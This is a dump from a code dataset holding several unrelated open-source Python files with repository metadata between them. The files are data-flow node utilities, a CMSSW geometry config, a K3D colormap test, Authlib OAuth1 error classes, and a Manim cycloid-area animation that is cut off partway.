elif "from_result_table_ids" in config:
return [{"id": 0, "from_result_table_ids": config["from_result_table_ids"]}]
else:
raise Errors.NodeValidError(_("节点的数据result table列表参数不正确"))
@staticmethod
def set_input_nodes_config(node_type, config, from_nodes_info):
"""
[
{
"id": 22771,
"from_result_table_ids": [
"591_test_1_clean"
]
},
{
"id": 22772,
"from_result_table_ids": [
"591_test_2_clean"
]
}
]
:param from_nodes_info:
:param node_type:
:param config:
:return:
"""
if node_type in NodeTypes.NEW_INPUTS_CATEGORY:
config["inputs"] = from_nodes_info
return config
else:
config["from_nodes"] = from_nodes_info
return config
@staticmethod
def get_upstream_nodes_info(node_type, from_node_ids, form_data):
"""
保存、更新节点时,获取当前节点的上游节点信息,用于创建元数据信息
"""
upstream_nodes_info = []
# 参数改造节点:未来 flow 表单的统一,多输入、多输出的 RT
if node_type in NodeTypes.NEW_FROM_RESULT_TABLE_IDS_CATEGORY + NodeTypes.NEW_INPUTS_CATEGORY:
for from_result_table in NodeUtils.get_input_nodes_config(node_type, form_data):
upstream_node = NODE_FACTORY.get_node_handler(from_result_table["id"])
if upstream_node.node_type in NodeTypes.ALL_KV_SOURCE_CATEGORY:
continue
upstream_nodes_info.append(
{
"upstream_node": upstream_node,
"result_table_id": from_result_table["from_result_table_ids"],
}
)
else:
for _n in NodeUtils.list_from_nodes_handler(from_node_ids):
# 上游是 kv 类型的节点,不需要对元数据进行更新操作
if _n.node_type in NodeTypes.ALL_KV_SOURCE_CATEGORY:
continue
upstream_nodes_info.append(
{
"upstream_node": _n,
"result_table_id": list(set(_n.result_table_ids) & set(form_data["from_result_table_ids"])),
}
)
return upstream_nodes_info
@staticmethod
def transform_time_unit_to_day(window_size, window_size_unit, window_offset, window_offset_unit):
# 全部转换成hour再计算差值
window_size_in_hour = 0
if window_size_unit == "hour":
window_size_in_hour = int(window_size)
elif window_size_unit == "day":
window_size_in_hour = int(window_size) * 24
elif window_size_unit == "week":
window_size_in_hour = int(window_size) * 24 * 7
elif window_size_unit == "month":
window_size_in_hour = int(window_size) * 24 * 31
window_offset_in_hour = 0
if window_offset_unit == "hour":
window_offset_in_hour = int(window_offset)
elif window_offset_unit == "day":
window_offset_in_hour = int(window_offset) * 24
elif window_offset_unit == "week":
window_offset_in_hour = int(window_offset) * 24 * 7
elif window_offset_unit == "month":
window_offset_in_hour = int(window_offset) * 24 * 31
max_delay_in_hour = window_offset_in_hour + window_size_in_hour
return int(max_delay_in_hour / 24) + 1
@staticmethod
def get_max_window_size_by_day(form_data):
"""
获取当前节点的计算的数据窗口长度,用于设置当前及下游节点的 HDFS 过期时间,单位为天
1. 若为固定窗口
1. 统一配置且窗口长度
a.单位为小时,除以24 + 1(避免不整除)
b.单位为周,取7
c.单位为月,取31
d.单位为日,取窗口长度
2. 若为自定义配置,单位原则与1一样,计算结果取大者
2. 若为累加窗口,返回1
@param form_data:
@return:
"""
# batch_window_config = {
# 'window_type': '',
# 'dependency_config_type': '',
# 'unified_config': {
# 'window_size_period': '',
# 'window_size': ''
# },
# 'custom_config': {
# 'result_table_id': {
# 'window_size_period': '',
# 'window_size': ''
# }
# }
# }
# TODO 以后各个离线类节点参数对齐
if "window_type" not in form_data and "window_config" in form_data:
# 离线指标节点
form_data = form_data["window_config"]
elif "schedule_config" in form_data and "serving_scheduler_params" in form_data["schedule_config"]:
# 时序自定义节点
return int(form_data["schedule_config"]["serving_scheduler_params"]["data_period"])
elif "serving_scheduler_params" in form_data:
# modelflow 节点,给个默认值 1。外部调用 max(7, 1) 返回7天
return 1
if "node_type" in form_data and form_data["node_type"] == "batchv2":
# batchv2 节点
max_window_size = 0
for one_window_info in form_data["window_info"]:
window_type = one_window_info["window_type"]
if window_type == "scroll" or window_type == "whole":
window_size = form_data["dedicated_config"]["schedule_config"]["count_freq"]
window_size_unit = form_data["dedicated_config"]["schedule_config"]["schedule_period"]
else:
window_size = one_window_info["window_size"]
window_size_unit = one_window_info["window_size_unit"]
if window_type == "whole":
window_offset = "0"
window_offset_unit = "hour"
else:
window_offset = one_window_info["window_offset"]
window_offset_unit = one_window_info["window_offset_unit"]
window_size_in_day = NodeUtils.transform_time_unit_to_day(
window_size, window_size_unit, window_offset, window_offset_unit
)
if window_size_in_day > max_window_size:
max_window_size = window_size_in_day
return max_window_size
else:
# 老batch节点
if form_data["window_type"] == "accumulate_by_hour":
return 1
else:
if form_data["dependency_config_type"] == "unified":
if form_data["unified_config"]["window_size_period"] == "hour":
return int(form_data["unified_config"]["window_size"] / 24) + 1
elif form_data["unified_config"]["window_size_period"] == "week":
return 7
elif form_data["unified_config"]["window_size_period"] == "month":
return 31
else:
return int(form_data["unified_config"]["window_size"])
else:
max_window_size = 0
for result_table_id, config in list(form_data["custom_config"].items()):
if config["window_size_period"] == "hour":
current_window_size = config["window_size"] / 24 + 1
elif config["window_size_period"] == "week":
current_window_size = 7
elif config["window_size_period"] == "month":
current_window_size = 31
else:
current_window_size = config["window_size"]
if max_window_size < int(current_window_size):
max_window_size = int(current_window_size)
return max_window_size
@staticmethod
def get_max_related_window_size(result_table_id):
"""
获取所有输出为 result_table_id 的节点的下游离线节点的最大时间窗口长度
@param result_table_id:
@return:
"""
max_window_size_by_day = 0
# 根据指定类型(离线节点上游合法节点类型)获取 result_table_id 的相关节点
related_nodes = NodeUtils.get_related_nodes_by_rt(result_table_id)
for related_node in related_nodes:
to_nodes = NodeUtils.get_to_nodes_handler_by_id(related_node.node_id)
for to_node in to_nodes:
if to_node.node_type in [
NodeTypes.BATCH,
NodeTypes.BATCHV2,
NodeTypes.MODEL_APP,
NodeTypes.DATA_MODEL_BATCH_INDICATOR,
]:
to_node_max_window_size_by_day = NodeUtils.get_max_window_size_by_day(to_node.get_config(False))
if to_node_max_window_size_by_day > max_window_size_by_day:
max_window_size_by_day = to_node_max_window_size_by_day
return max_window_size_by_day
@staticmethod
def is_modify_dp_node_with_udf(processing_id):
"""
判断节点是否为实时节点、离线节点(可以使用udf的节点),并且udf最新版本和节点使用的udf版本不一致,则需要修改
:return: True (需要修改)、False(不需要修改)
"""
return is_modify_with_udf_released(processing_id)
@staticmethod
def build_from_nodes_list(from_node_ids):
"""
组装 SQL 中 from 表名等标识对应的结果表(静态或非静态)
@param from_node_ids:
@return:
"""
from_nodes = [NODE_FACTORY.get_node_handler(_id) for _id in from_node_ids]
not_static_rt_ids = []
static_rt_ids = []
source_rt_ids = []
for _node in from_nodes:
_table_info = {
"category": _node.node_type,
"result_table_ids": _node.result_table_ids,
}
parent_node_type = _table_info["category"]
if parent_node_type in NodeTypes.STREAM_KV_SOURCE_CATEGORY:
static_rt_ids.extend(_table_info["result_table_ids"])
else:
not_static_rt_ids.extend(_table_info["result_table_ids"])
if parent_node_type in NodeTypes.SOURCE_CATEGORY:
source_rt_ids.extend(_table_info["result_table_ids"])
return not_static_rt_ids, static_rt_ids, source_rt_ids
@staticmethod
def filter_batch(node_handlers):
"""
从节点列表中,过滤离线节点,如果是存储数据节点,需要找到关联的计算节点
@param node_handlers 节点列表
"""
# 取出离线型节点
_from_node_handlers = list(
filter(
lambda _n: _n.node_type in NodeTypes.BATCH_CATEGORY + NodeTypes.BATCH_SOURCE_CATEGORY,
node_handlers,
)
)
batch_nodes = []
for one_from_node_handler in _from_node_handlers:
if one_from_node_handler.node_type in NodeTypes.BATCH_CATEGORY:
batch_nodes.append(one_from_node_handler)
elif one_from_node_handler.node_type in NodeTypes.BATCH_SOURCE_CATEGORY:
_origin_node = one_from_node_handler.get_rt_generated_node()
# 当实时节点接HDFS存储,该节点产生的RT可以作为离线数据源节点的结果表
if _origin_node is not None and _origin_node.node_type in NodeTypes.BATCH_CATEGORY:
batch_nodes.append(_origin_node)
return batch_nodes
@staticmethod
def get_origin_batch_node(node_handler):
"""
通过节点的上下关系,找到离线节点的起始节点,此处定义为根"离线属性"节点,
这里需要考虑以下两种场景
1. 场景一(F 的根离线节点为 C)
A(实时) -> B(HDFS) -> C(离线) -> D(离线) -> E(离线)
|
v
F(离线)
2. 场景二(H 的根离线节点为 C)
A(实时) -> B(HDFS) -> C(离线 rt_c)
D(存储数据 rt_c) -> E(离线) -> F(离线) -> G(离线)
|
v
H(离线)
"""
candidate_node = node_handler
while True:
batch__from_nodes = NodeUtils.filter_batch(candidate_node.get_from_nodes_handler())
if not batch__from_nodes:
break
# 如果不是根离线节点,则任意取一父节点作为候选节点,继续遍历校验
candidate_node = batch__from_nodes[0]
return candidate_node
@staticmethod
def get_storage_cluster_groups(storage_type, cluster_name):
"""
根据集群名称获取存储集群所在的集群组
"""
res_data = StorekitHelper.get_storage_cluster_config(storage_type, cluster_name)
if not res_data:
raise ApiResultError(
_("存储集群信息未包含集群%(cluster_name)s,存储类型%(storage_type)s信息.")
% {"cluster_name": cluster_name, "storage_type": storage_type}
)
cluster_groups = [res_data["cluster_group"]]
return cluster_groups
@staticmethod
def check_expires(node_type, from_nodes, form_data):
"""
校验当前设置的过期时间是否合法
HDFS:
1. 对于上游是离线计算的情况,需要校验当前过期时间是否大于其数据窗口长度
2. 对于上游 RT 被关联为数据源的情况,需要校验其是否被其它下游离线用到,并计算最大数据窗口长度
"""
if "expires" not in form_data or form_data["expires"] == -1:
return True
if node_type in [NodeTypes.HDFS_STORAGE]:
for from_node in from_nodes:
if from_node.node_type in [
NodeTypes.BATCH,
NodeTypes.BATCHV2,
NodeTypes.MODEL_APP,
NodeTypes.DATA_MODEL_BATCH_INDICATOR,
]:
max_window_size_by_day = NodeUtils.get_max_window_size_by_day(from_node.get_config(False))
if form_data["expires"] < max_window_size_by_day:
raise Errors.NodeError(_("存储过期时间应大于或等于上游离线节点数据窗口长度"))
max_related_window_size = NodeUtils.get_max_related_window_size(form_data["result_table_id"])
if form_data["expires"] < max_related_window_size:
raise Errors.NodeError(_("当前结果表被离线计算使用,过期时间应大于或等于其数据窗口长度(%s天)") % max_related_window_size)
@staticmethod
def get_rt_related_storage_node(flow_id, result_table_ids):
"""
获取当前flow中某个rt相关的存储节点id列表(节点的from_result_table_ids中包含该rt)
"""
ret = []
nodes = FlowNodeInfo.objects.filter(flow_id=flow_id)
for node in nodes:
node_id = node.node_id
node_type = node.node_type
if node_type not in NodeTypes.STORAGE_CATEGORY:
continue
node_config = node.load_config(True, loading_concurrently=True)
if "from_result_table_ids" in node_config:
from_result_table_ids = [x.encode("utf-8") for x in node_config["from_result_table_ids"]]
if set(result_table_ids) <= set(from_result_table_ids):
ret.append(node_id)
return ret
|
e9b5cf30945d8503b8a688683122588394e256fc
|
a5a99f646e371b45974a6fb6ccc06b0a674818f2
|
/Geometry/HcalEventSetup/python/CaloTowerGeometryDBReader_cfi.py
|
1ae683aed2ab16c397750fef305fd0f62c7b8b04
|
[
"Apache-2.0"
] |
permissive
|
cms-sw/cmssw
|
4ecd2c1105d59c66d385551230542c6615b9ab58
|
19c178740257eb48367778593da55dcad08b7a4f
|
refs/heads/master
| 2023-08-23T21:57:42.491143
| 2023-08-22T20:22:40
| 2023-08-22T20:22:40
| 10,969,551
| 1,006
| 3,696
|
Apache-2.0
| 2023-09-14T19:14:28
| 2013-06-26T14:09:07
|
C++
|
UTF-8
|
Python
| false
| false
| 239
|
py
|
CaloTowerGeometryDBReader_cfi.py
|
import FWCore.ParameterSet.Config as cms
CaloTowerGeometryFromDBEP = cms.ESProducer( "CaloTowerGeometryFromDBEP",
applyAlignment = cms.bool(False)
)
|
9a9579db432af7043bbc12b987154660fa95b5bf
|
afbeee6a3a83946449e5fccf7c74457461ed921f
|
/k3d/test/test_colormap.py
|
308c1b006e5fba5512e6412570d838d965e35a77
|
[
"MIT"
] |
permissive
|
K3D-tools/K3D-jupyter
|
d69e541de90835415be5516d3e6758b1fcd530d2
|
5973d30947f6bc80b2a50ba260f198bec57ddfc1
|
refs/heads/main
| 2023-09-01T20:41:01.159202
| 2023-08-26T20:45:56
| 2023-08-26T20:45:56
| 44,377,817
| 859
| 134
|
MIT
| 2023-08-26T20:33:59
| 2015-10-16T10:14:20
|
Python
|
UTF-8
|
Python
| false
| false
| 1,084
|
py
|
test_colormap.py
|
import numpy as np
import unittest
from ..colormaps.basic_color_maps import Rainbow, Binary
from ..helpers import map_colors
class TestPythonColorMapping(unittest.TestCase):
# Rainbow: for 0 - blue, for 1 - red
def test_zeros(self):
# given
attribute = np.zeros(5)
# when
colors = map_colors(attribute, Rainbow)
# then
self.assertTrue((colors == np.ones(5, dtype=np.int32) * 0xff).all())
def test_ones(self):
# given
attribute = np.ones(5)
# when
# color range needed here, if uniform, range inferred as [1., 2.], which also gives all blue
colors = map_colors(attribute, Rainbow, color_range=(0., 1.))
# then
self.assertTrue((colors == np.ones(5, dtype=np.int32) * 0xff0000).all())
def test_gradient(self):
# given
attribute = np.array([0, 0.5, 1])
# when
colors = map_colors(attribute, Binary)
# then
self.assertTrue((colors == [0xffffff, 0x7f7f7f, 0]).all())
if __name__ == '__main__':
unittest.main()
|
fc37cb9fa153acc39f49da82a3f797710d5d2af5
|
a2b3987eb8a50bee311f869e39d1c76e738ba2b8
|
/authlib/oauth1/rfc5849/errors.py
|
93396fcebffc2bfdc9d8456c78e538ef4babc988
|
[
"BSD-3-Clause",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
lepture/authlib
|
abb3e14b8ccacef9ade90b28efed827ab65aadce
|
1846d6ac66e89bdb3268fffe15b7e49289966366
|
refs/heads/master
| 2023-09-04T04:27:56.650738
| 2023-09-02T07:42:47
| 2023-09-02T07:42:47
| 108,510,280
| 4,091
| 481
|
BSD-3-Clause
| 2023-09-13T13:04:38
| 2017-10-27T06:52:26
|
Python
|
UTF-8
|
Python
| false
| false
| 2,303
|
py
|
errors.py
|
"""
authlib.oauth1.rfc5849.errors
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
RFC5849 has no definition on errors. This module is designed by
Authlib based on OAuth 1.0a `Section 10`_ with some changes.
.. _`Section 10`: https://oauth.net/core/1.0a/#rfc.section.10
"""
from authlib.common.errors import AuthlibHTTPError
from authlib.common.security import is_secure_transport
class OAuth1Error(AuthlibHTTPError):
def __init__(self, description=None, uri=None, status_code=None):
super().__init__(None, description, uri, status_code)
def get_headers(self):
"""Get a list of headers."""
return [
('Content-Type', 'application/x-www-form-urlencoded'),
('Cache-Control', 'no-store'),
('Pragma', 'no-cache')
]
class InsecureTransportError(OAuth1Error):
error = 'insecure_transport'
description = 'OAuth 2 MUST utilize https.'
@classmethod
def check(cls, uri):
if not is_secure_transport(uri):
raise cls()
class InvalidRequestError(OAuth1Error):
error = 'invalid_request'
class UnsupportedParameterError(OAuth1Error):
error = 'unsupported_parameter'
class UnsupportedSignatureMethodError(OAuth1Error):
error = 'unsupported_signature_method'
class MissingRequiredParameterError(OAuth1Error):
error = 'missing_required_parameter'
def __init__(self, key):
description = f'missing "{key}" in parameters'
super().__init__(description=description)
class DuplicatedOAuthProtocolParameterError(OAuth1Error):
error = 'duplicated_oauth_protocol_parameter'
class InvalidClientError(OAuth1Error):
error = 'invalid_client'
status_code = 401
class InvalidTokenError(OAuth1Error):
error = 'invalid_token'
description = 'Invalid or expired "oauth_token" in parameters'
status_code = 401
class InvalidSignatureError(OAuth1Error):
error = 'invalid_signature'
status_code = 401
class InvalidNonceError(OAuth1Error):
error = 'invalid_nonce'
status_code = 401
class AccessDeniedError(OAuth1Error):
error = 'access_denied'
description = 'The resource owner or authorization server denied the request'
class MethodNotAllowedError(OAuth1Error):
error = 'method_not_allowed'
status_code = 405
|
072ed87ca64b1d92b1d7595bab438aa2ef1af2f2
|
6d6bdf36ae14b749fa34fffb3abcd339bc0c135a
|
/my_projects/Cycloid_Area.py
|
34f105bd8c1df64713b9d1e353a5806b66303e15
|
[
"MIT"
] |
permissive
|
cigar666/my_manim_projects
|
201276c3fe4008bc5ff26950bca8280f19c56bbc
|
d693676580dad47b3e64b3f20f7aff9b5ef4f68c
|
refs/heads/master
| 2022-05-06T06:48:00.030028
| 2022-04-22T13:07:21
| 2022-04-22T13:07:21
| 241,033,399
| 204
| 66
|
MIT
| 2020-06-04T09:46:01
| 2020-02-17T06:14:26
|
Python
|
UTF-8
|
Python
| false
| false
| 36,790
|
py
|
Cycloid_Area.py
|
"""
> Author : cigar666
> Created Time : 2020/02/26
> Animation used in : https://www.bilibili.com/video/av92747585
"""
from manimlib.imports import *
from my_manim_projects.my_utils.my_geometry import *
class Cycloid_generation(Scene):
def construct(self):
r = 1.5
circle = Circle(radius=r, color=WHITE, stroke_width=2.5, fill_color=RED, fill_opacity=0)
init_O = DOWN * 0. + LEFT * PI * r + r * UP
ground_line = Line(DOWN * 0. + LEFT * 6, DOWN * 0. + RIGHT * 6, color=WHITE, stroke_width=2.5)
dot_O = Dot(init_O, color=YELLOW, plot_depth=1)
dot_P = Dot(init_O + r * DOWN, color=BLUE, plot_depth=1)
line_r = Line(dot_O.get_center(), dot_P.get_center(), stroke_width=2.5)
get_t = lambda : (dot_O.get_center()[0] - init_O[0]) / r
get_P = lambda t: np.array([t - np.sin(t), 1 - np.cos(t), 0]) * r
dot_P.add_updater(lambda d: d.move_to(init_O + r * DOWN + get_P(get_t())))
line_r.add_updater(lambda l: l.become(Line(init_O + r * get_t() * RIGHT, init_O + r * DOWN + get_P(get_t()), stroke_width=2.5)))
circle.add_updater(lambda c: c.move_to(dot_O))
area = Polygon(*[init_O + r * DOWN + get_P(t) for t in np.linspace(0, TAU, 100)], fill_color=BLUE, fill_opacity=0.6)
curve = ParametricFunction(lambda t: init_O + r * DOWN + get_P(t), t_min=0, t_max=TAU, stroke_width=2)
curve.add_updater(lambda c: c.become(ParametricFunction(lambda t: init_O + r * DOWN + get_P(t),
t_min=-0.01, t_max=get_t(), stroke_width=2)))
text = Text('S = ?', font='思源黑体 Bold').scale([1.8, 1.5, 1])
text.set_color_by_t2c({'S': BLUE, '?': PINK})
text.shift(DOWN * 1.5)
self.play(ShowCreation(ground_line))
self.wait(0.5)
self.play(FadeIn(dot_O), run_time=0.7)
self.play(FadeIn(circle), run_time=0.8)
self.wait(0.2)
self.play(ShowCreation(line_r))
self.play(FadeIn(dot_P), run_time=0.7)
self.wait(0.6)
self.add(curve)
self.play(dot_O.shift, 2 * PI * r * RIGHT, rate_func=linear, run_time=4)
self.wait()
self.play(FadeIn(area), run_time=1.2)
self.wait(0.4)
self.play(TransformFromCopy(area, text), run_time=1.5)
self.wait(0.5)
# self.play(ShowCreationThenFadeAround(SurroundingRectangle(text)), run_time=1.25)
self.play(WiggleOutThenIn(text), run_time=1.2)
self.wait(5)
class Area_divide_into_tri(Scene):
def construct(self):
r = 1.5
n = 6
points_6 = [complex_to_R3(r * np.exp(1j * TAU/n * i)) for i in range(n)]
poly_6 = Polygon(*points_6, stroke_width=3)
poly_6.shift(r * 3 * LEFT + UP * 2)
ground_line = Line(DOWN * r * np.sqrt(3)/2 + UP * 2 + LEFT * 6, DOWN * r * np.sqrt(3)/2 + UP * 2 + RIGHT * 6, color=WHITE, stroke_width=2.5)
dot_pink = Dot(poly_6.get_center() + complex_to_R3(r * np.exp(1j * (-2) * TAU/n)), color=PINK, plot_depth=1)
start_point = dot_pink.get_center()
poly = VGroup(poly_6, dot_pink)
self.add(ground_line)
self.play(ShowCreation(poly_6))
self.play(FadeInFromLarge(dot_pink))
self.wait()
line_points = []
p_old = dot_pink.get_center()
line_group = VGroup()
for i in range(n):
self.add(poly.copy().set_stroke(opacity=0.4))
self.play(Rotating(poly, radians=-TAU/n, about_point=poly_6.get_center() + complex_to_R3(r * np.exp(1j * (-1) * TAU/n)), run_time=1.2)) #
line_group.add(Line(p_old, dot_pink.get_center(), stroke_width=2.5))
self.play(ShowCreation(line_group[-1]), run_time=0.5)
p_old = dot_pink.get_center()
self.play(FadeIn(poly.copy().set_stroke(opacity=0.25)), run_time=0.25)
self.wait(0.5)
c1, c2, c3, c4 = RED, BLUE, YELLOW, GREEN
# r0 = 0.01
tri_1_01 = Polygon(start_point + r * RIGHT, start_point + 2 * r * RIGHT,
start_point + r/2 * RIGHT + r * np.sqrt(3)/2 * UP,
color=WHITE, stroke_width=2., fill_color=c1, fill_opacity=0.8)#.round_corners(r0)
tri_1_02 = Polygon(start_point + 2 * r * RIGHT, start_point + 3 * r * RIGHT,
start_point + 2 * r * RIGHT + r * np.sqrt(3) * UP,
color=WHITE, stroke_width=2., fill_color=c1, fill_opacity=0.8)#.round_corners(r0)
tri_1_03 = Polygon(start_point + 3 * r * RIGHT, start_point + 4 * r * RIGHT,
start_point + 4 * r * RIGHT + r * np.sqrt(3) * UP,
color=WHITE, stroke_width=2., fill_color=c1, fill_opacity=0.8)#.round_corners(r0)
tri_1_04 = Polygon(start_point + 4 * r * RIGHT, start_point + 5 * r * RIGHT,
start_point + 5.5 * r * RIGHT + r * np.sqrt(3)/2 * UP,
color=WHITE, stroke_width=2., fill_color=c1, fill_opacity=0.8)#.round_corners(r0)
tri_2_01 = Polygon(start_point + 0 * RIGHT, start_point + 1 * r * RIGHT,
start_point - r/2 * RIGHT + r * np.sqrt(3)/2 * UP,
color=WHITE, stroke_width=2., fill_color=c2, fill_opacity=0.8)#.round_corners(r0)
tri_2_02 = Polygon(start_point + 0.5 * r * RIGHT + np.sqrt(3)/2 * r * UP,
start_point + 2 * r * RIGHT, start_point + r * RIGHT + r * np.sqrt(3) * UP,
color=WHITE, stroke_width=2., fill_color=c2, fill_opacity=0.8)#.round_corners(r0)
tri_2_03 = tri_2_02.copy().flip(about_point=0.5 * r * LEFT)
tri_2_04 = tri_2_01.copy().flip(about_point=0.5 * r * LEFT)
tri_3_01 = Polygon(start_point + 2 * r * RIGHT, start_point + 1.5 * r * RIGHT + np.sqrt(3)/2 * r * UP,
start_point + r * 2 * RIGHT + r * np.sqrt(3) * UP,
color=WHITE, stroke_width=2., fill_color=c3, fill_opacity=0.8)#.round_corners(r0)
tri_3_02 = Polygon(start_point + 2 * r * RIGHT + np.sqrt(3) * r * UP,
start_point + 3 * r * RIGHT + np.sqrt(3) * r * UP, start_point + 3 * r * RIGHT,
color=WHITE, stroke_width=2., fill_color=c3, fill_opacity=0.8)#.round_corners(r0)
tri_3_03 = tri_3_02.copy().flip(about_point=0.5 * r * LEFT)
tri_3_04 = tri_3_01.copy().flip(about_point=0.5 * r * LEFT)
tri_4_01 = Polygon(start_point, start_point + 1 * r * RIGHT,
start_point + r * 0.5 * RIGHT + r * np.sqrt(3)/2 * UP,
color=WHITE, stroke_width=2., fill_color=c4, fill_opacity=0.8)#.round_corners(r0)
tri_4_02 = Polygon(start_point + r * 0.5 * RIGHT + r * np.sqrt(3)/2 * UP,
start_point + 2 * r * RIGHT + np.sqrt(3) * r * UP, start_point + 2 * r * RIGHT,
color=WHITE, stroke_width=2., fill_color=c4, fill_opacity=0.8)#.round_corners(r0)
tri_4_03 = tri_4_02.copy().flip(about_point=0.5 * r * LEFT)
tri_4_04 = tri_4_01.copy().flip(about_point=0.5 * r * LEFT)
tri_group_01, tri_group_02, tri_group_03, tri_group_04 = VGroup(tri_1_01, tri_1_02, tri_1_03, tri_1_04),\
VGroup(tri_2_01, tri_2_02, tri_2_03, tri_2_04),\
VGroup(tri_3_01, tri_3_02, tri_3_03, tri_3_04),\
VGroup(tri_4_01, tri_4_02, tri_4_03, tri_4_04)
self.play(FadeIn(tri_group_01), FadeIn(tri_group_04), FadeIn(tri_group_03[1:3]))
self.wait()
self.play(ReplacementTransform(tri_group_04[0], tri_group_02[0]), run_time=1.25)
self.wait(0.25)
self.play(ReplacementTransform(tri_group_04[1], VGroup(tri_group_02[1], tri_group_03[0])), run_time=1.25)
self.wait(0.25)
self.play(ReplacementTransform(tri_group_04[2], VGroup(tri_group_02[2], tri_group_03[-1])), run_time=1.25)
self.wait(0.25)
self.play(ReplacementTransform(tri_group_04[3], tri_group_02[3]), run_time=1.25)
self.wait(1.25)
## rearrange triangles ##
p_6 = [complex_to_R3(r * np.exp(1j * (TAU/n * i + PI/2))) for i in range(n)]
t_01 = Polygon(p_6[0], p_6[1], p_6[2],color=WHITE, stroke_width=2., fill_color=c1, fill_opacity=0.8)#.round_corners(r0)
t_02 = Polygon(p_6[0], p_6[2], p_6[3],color=WHITE, stroke_width=2., fill_color=c1, fill_opacity=0.8)#.round_corners(r0)
t_03 = Polygon(p_6[0], p_6[3], p_6[4],color=WHITE, stroke_width=2., fill_color=c1, fill_opacity=0.8)#.round_corners(r0)
t_04 = Polygon(p_6[0], p_6[4], p_6[5],color=WHITE, stroke_width=2., fill_color=c1, fill_opacity=0.8)#.round_corners(r0)
poly_by_tri_01 = VGroup(t_01, t_02, t_03, t_04)
poly_by_tri_02 = poly_by_tri_01.copy().set_fill(color=c2).shift(DOWN * r)
poly_by_tri_03 = poly_by_tri_01.copy().set_fill(color=c3).shift(DOWN * r + RIGHT * r * 2.5)
poly_by_tri_01.shift(DOWN * r + LEFT * r * 2.5)
self.play(TransformFromCopy(tri_group_01, poly_by_tri_01), run_time=2.25)
self.wait(0.75)
self.play(TransformFromCopy(tri_group_02, poly_by_tri_02), run_time=2.25)
self.wait(0.75)
self.play(TransformFromCopy(tri_group_03, poly_by_tri_03), run_time=2.25)
self.wait(4)
class Area_divide_into_tri_02(Scene):
def construct(self):
r = 1.5
n = 8
points_8 = [complex_to_R3(r * np.exp(1j * (TAU/n * i + PI/n))) for i in range(n)]
poly_8 = Polygon(*points_8, stroke_width=3)
poly_8.shift(r * 3 * LEFT + UP * 2)
ground_line = Line(DOWN * r * np.cos(PI/n) + UP * 2 + LEFT * 6, DOWN * r * np.cos(PI/n) + UP * 2 + RIGHT * 6, color=WHITE, stroke_width=2.5)
dot_pink = Dot(poly_8.get_center() + complex_to_R3(r * np.exp(1j * ((-3) * TAU/n + PI/n))), color=PINK, plot_depth=1)
start_point = dot_pink.get_center()
poly = VGroup(poly_8, dot_pink)
self.add(ground_line)
self.wait()
self.play(ShowCreation(poly_8))
self.play(FadeInFromLarge(dot_pink), run_time=0.75)
self.wait()
line_points = []
p_old = dot_pink.get_center()
line_group = VGroup()
for i in range(n):
self.add(poly.copy().set_stroke(opacity=0.4))
self.play(Rotating(poly, radians=-TAU/n, about_point=poly_8.get_center() + complex_to_R3(r * np.exp(1j * ((-2) * TAU/n + PI/n))), run_time=0.8)) #
line_group.add(Line(p_old, dot_pink.get_center(), stroke_width=2.5))
self.play(ShowCreation(line_group[-1]), run_time=0.4)
p_old = dot_pink.get_center()
# self.play(FadeIn(poly.copy().set_stroke(opacity=0.25)), run_time=0.25)
self.wait(2.)
r = 1.5
n = 10
points_10 = [complex_to_R3(r * np.exp(1j * TAU/n * i)) for i in range(n)]
poly_10 = Polygon(*points_10, stroke_width=3)
poly_10.shift(r * 3 * LEFT + DOWN * 2)
ground_line = Line(DOWN * r * np.cos(PI/n) + DOWN * 2 + LEFT * 6, DOWN * r * np.cos(PI/n) + DOWN * 2 + RIGHT * 6, color=WHITE, stroke_width=2.5)
dot_pink = Dot(poly_10.get_center() + complex_to_R3(r * np.exp(1j * (-3) * TAU/n)), color=PINK, plot_depth=1)
start_point = dot_pink.get_center()
poly = VGroup(poly_10, dot_pink)
self.play(ShowCreation(ground_line))
self.wait()
self.play(ShowCreation(poly_10))
self.play(FadeInFromLarge(dot_pink))
self.wait()
line_points = []
p_old = dot_pink.get_center()
line_group = VGroup()
for i in range(n):
self.add(poly.copy().set_stroke(opacity=0.4))
self.play(Rotating(poly, radians=-TAU/n, about_point=poly_10.get_center() + complex_to_R3(r * np.exp(1j * (-2) * TAU/n)), run_time=0.72)) #
line_group.add(Line(p_old, dot_pink.get_center(), stroke_width=2.5))
self.play(ShowCreation(line_group[-1]), run_time=0.36)
p_old = dot_pink.get_center()
self.wait(2)
self.play(VGroup(*self.mobjects).shift, UP * 4, run_time=1.8)
self.wait()
start_point += 4 * UP
c1, c2, c3, c4 = RED, BLUE, YELLOW, GREEN
# r0 = 0.0001
tri_group_01 = VGroup()
l = r * np.sin(PI/n) * 2
for i in range(1, 5):
tri_group_01.add(Polygon(start_point + l * i * RIGHT, start_point + l * (i+1) * RIGHT, line_group[i-1].get_end(),
color=WHITE, stroke_width=2.5, fill_color=c1, fill_opacity=0.8))
for i in range(5, 9):
tri_group_01.add(Polygon(start_point + l * i * RIGHT, start_point + l * (i+1) * RIGHT, line_group[i-1].get_end(),
color=WHITE, stroke_width=2.5, fill_color=c1, fill_opacity=0.8))
tri_group_02 = VGroup()
for i in range(0, 4):
tri_group_02.add(Polygon(line_group[i].get_start(), start_point + l * (i+1) * RIGHT,
line_group[i].get_end() + l * LEFT,
color=WHITE, stroke_width=2., fill_color=c2, fill_opacity=0.8))
for i in range(0, 4):
tri_group_02.add(Polygon(line_group[3-i].get_start(), start_point + l * (3-i+1) * RIGHT,
line_group[3-i].get_end() + l * LEFT,
color=WHITE, stroke_width=2., fill_color=c2, fill_opacity=0.8).flip(about_point=start_point + l * 5))
tri_group_03 = VGroup()
for i in range(1, 4):
tri_group_03.add(Polygon(line_group[i].get_end(), start_point + l * (i+1) * RIGHT,
line_group[i-1].get_end() + l * RIGHT,
color=WHITE, stroke_width=2., fill_color=c3, fill_opacity=0.8))
tri_group_03.add(Polygon(line_group[3].get_end(), start_point + l * 5 * RIGHT,
line_group[3].get_end() + l * RIGHT,
color=WHITE, stroke_width=2., fill_color=c3, fill_opacity=0.8))
tri_group_03.add(Polygon(line_group[3].get_end(), start_point + l * 5 * RIGHT,
line_group[3].get_end() + l * RIGHT,
color=WHITE, stroke_width=2., fill_color=c3, fill_opacity=0.8).flip(about_point=start_point + l * 5))
for i in range(1, 4):
tri_group_03.add(Polygon(line_group[4-i].get_end(), start_point + l * (4-i+1) * RIGHT,
